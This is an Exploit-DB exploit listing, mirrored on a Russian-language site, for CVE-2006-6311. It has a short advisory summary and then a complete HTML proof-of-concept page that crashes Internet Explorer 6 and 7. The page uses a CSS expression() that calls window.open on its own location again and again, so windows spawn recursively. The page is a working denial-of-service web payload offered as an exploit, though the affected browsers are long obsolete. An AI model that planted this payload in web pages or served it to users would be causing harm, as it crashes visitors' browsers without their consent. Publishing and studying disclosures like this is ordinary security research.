- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29236
- Проверка EDB
-
- Пройдено
- Автор
- XIAM.CORE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2006-6311
- Дата публикации
- 2006-12-06
HTML:
source: https://www.securityfocus.com/bid/21466/info
Microsoft Internet Explorer is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.
This issue is triggered when an attacker entices a victim user to visit a malicious website.
Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.
Internet Explorer 6 and 7 are vulnerable to this issue; other versions may also be affected.
<html> <head> <title>Another non-standards compliant IE D.O.S.</title> </head> <body> <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');"> <tr> <td> IE makes my life harder :(. It sucks, don't use it :). </td> </tr> </table> </div> Written by <a href="http://xiam.be">xiam</a>.<br /> Tested under IE 6.0.2900.2180 </body> </html>
- Источник
- www.exploit-db.com